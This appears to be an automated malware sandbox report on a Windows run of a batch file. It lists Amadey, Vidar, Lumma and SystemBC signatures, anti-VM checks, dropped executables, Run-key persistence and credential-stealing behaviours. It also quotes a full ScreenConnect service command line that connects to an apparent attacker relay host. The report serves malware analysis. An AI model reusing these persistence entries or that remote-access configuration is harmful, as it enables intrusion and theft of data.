"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3172 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0621e31d12b6e16ab28de3e74462a4ce
SHA1 0af6f056aff6edbbc961676656d8045cbe1be12b
SHA256 1fd3365fdb49f26471ce9e348ce54c9bc7b66230118302b32074029d88fb6030
SHA512 bf0aa5b97023e19013d01abd3387d074cdd5b57f98ec4b0241058b39f9255a7bbab296dce8617f3368601a3d751a6a66dc207d8dd3fc1cba9cac5f98e3127f6f

\??\pipe\LOCAL\crashpad_404_UZJMFXSTJWXGJZQO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 56361f50f0ee63ef0ea7c91d0c8b847a
SHA1 35227c31259df7a652efb6486b2251c4ee4b43fc
SHA256 7660beecfee70d695225795558f521c3fb2b01571c224b373d202760b02055c0
SHA512 94582035220d2a78dfea9dd3377bec3f4a1a1c82255b3b74f4e313f56eb2f7b089e36af9fceea9aa83b7c81432622c3c7f900008a1bdb6b1cd12c4073ae4b8a2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0035cefdc2eadd70e6e411183343db15
SHA1 eafefd46baf90d4bb46271c74a68bfc25de26881
SHA256 60bc6e3a5841ae3936db216589efb029f4a1b0a835cf290e16d27dc726101dc4
SHA512 a9d5026bf3df9153fd5e493851a1484bc192a0a2de8deaa415273bb288c614b0fe151a3c8aa313412c0bef2186c825b83636ed2c41b6b616cb97d0ebd27fd3d2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 252652d75e79636e49e4af50aa463ddf
SHA1 6c2756111e4669f40bffef7e8faecd7144a46f35
SHA256 a0176bc1d902040286da421f5e7de3fb675bcfee94df7db2350bd62b150f5086
SHA512 372fa7e7e11ee9e79136f24d5b60b17bb14a82c2221c3f101fa3123e929fdf19104effef57423fb49065f07c09a76701c050bfbfe883c9434bedd860e38f454e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f79721db11ebf92de3a5a21fe366dd11
SHA1 d0f3efe671c0575358515c7f956dc9f8366d37ea
SHA256 6784bc76eea2d1b423957c410d222c7426e38a3f5d6817d842a5146ba4f86106
SHA512 84a4c320e0130936f38f02458109e111a612cf9333c01e4ac0941c644791610978899c09aadb63f618b66c7eca9552b6c6cd8554f75c77b9773f58fe4ecba3cb

Analysis: behavioral13

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

149s

Max time network

151s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=6b3c9f2e-719d-4888-b6ab-03b40b2eb090&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAU5OaUtE1TkuAPjiKumW%2bygAAAAACAAAAAAAQZgAAAAEAACAAAAAw8RLkaTVVS0QGmN%2fM62zkgh9ftEh44PE3JHHXJtDipQAAAAAOgAAAAAIAACAAAACPBk%2bV%2fR9PfcVr1ydNe6gmddRXwrPIU63zMEqNkV9OEaAEAADkYLVoGIM9DRzerSW1TZY%2fgfpc3yStncNb33ZhAkVqx9hVIoelHdIVD2TFgDbSdBFfP7S1W%2fzDzL3rwGjKBzLDmyRlsn41P%2f6bSTbhir7oo38FDgwESeKnMLLzQuRVg8UePm1sIQRXfA1bipCyvR6N04xh8qZ9w6EVzdzWbLFzjRRXpgT6%2fqpL4vF43WRtAjYqO%2baQDl24hLl5YGkBYFge%2fDZqninCMzoXPz4AfN7UoPI%2bXuLoiRy5rmcIQgnZ%2fgPKj6IFaOEhhaKCOSsStmQQce%2bCCCjR6PTjpxsYXKgvy71VkyM7YLPoRyQ9b11LOvmGEM2LtIo8uTBWcOS%2bF%2bPMFAueAd%2f2Deb56tBV0kpb7zPze1gmtXFLmdCrjC1g6IRzBzXEHm4l5wlVDZobdu9am3sYzGIJnKhcW6VaP97C%2bryQe1nAVv6sv2ce7ObKssir8pk4Rq4gq095H%2bWddEXU1LV5WEAntcWwPB0MMJ74hCEc9Fg6hz7ajU7GIpVVL592XOZ%2fAu4NLctY9hwN5nQ3ScGwuQ84argdU%2bRtndXpMMDao%2fnd2gcl%2fUC7tUDbKQ0H1yHdNDg8tOyUixEuVJo4Jn8LGez7YcoHOG2FDEfNN26KeA8skipszJfMrUt0pAST4YQ2CcHuhsdRC1cNvwf8XFLY8OiKrQRimzoKTF1pDWAkasqfci38vKWqTegNq6Nj0RdX6gVgXNuyi85bo%2fbQ%2b0Y%2fVdgVmggfEycegt2GK%2fjT4MpCXlBn5%2bja89OoAdm%2bID196i%2b%2b1AdDJVkPZEqbmAYXrkaZEVHZYvXWod4ztdu1YGg6qdR3a4SV%2bB5aIUL0y3HcKqczWtdwtvpb53boFrGlQU47Utrsem0XZBGTGNw2xhbISH5fESXSMCdK6FLMKI8Omr9I%2fv6InZuQVSS4kJnhC2TkTV%2b9ZserhBFcMoFzhMMooMmabslTLftw3rd82uuv8scOf9Xp%2b8ah7LD9dcWMSb9iKN88ZpnUAnSHjVDBMLxfcdel5%2fHYmACo5JTKaWFN%2fqmFGNzQyyKvzLHw6a%2byWANedvG2XXQpUnSe6HBgPa%2bxVrKjikrxIba2LMyzDGrw660KKKwl0AF7mzUhbwByYjaJfZweXtnEWizmfNmNSvRxT42HhvJ517imA%2beK2IrxcupOQ2uuiJPG1UzqsobBQTVBMMD0PW2xXdTmwbLdRqPqGqBEnoBwu7MR2QG0BwuHyirumqilhZ3bXovitTDSjP2LwI5p1rhqpngYyEkt%2bqddkYG%2fOzgkYmVkJkEYwlQ4b4mo9qZ77tcVXCATjDr8jGdRR%2bvcKfvzd1ZZJSmbf4CiNlTGzPBYeZVgigk%2bvqa7r7YJHMWK8bXp34cPiaiZ%2fuPObdiPXOK3dChMWLvle%2fp8r0aj4DBPuRENHJAHCcs5%2fwJitYQS7UGvyJJsCCQFWE6ZPYu13bUHI0faYuRmSEYHnDGtmIOzGiTAu4PyOPCXlvB0wtEVIUPYsl1N3EubzyeBKlF5PznZolmm5iWq2tDANPrloBvThdLTDp6AmePl0wDEsSHLm4X2fBBNYDHJX831tYqENrkK9aQCbkAAAABbkiKYWXUMRxwRufr7i9O0T32%2bpBGj8gSywdehmhuJurcDKFNYT8P5bmAUhN2Y3BjUbD01Qu2%2fbKEuvoJFPfhi&c=test&c=&c=&c=&c=&c=&c=&c=\"" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\cb4d3138f3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036500101\\cb4d3138f3.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\7fc0d1d799.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\7fc0d1d799.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\0d88a612ec.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036490101\\0d88a612ec.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
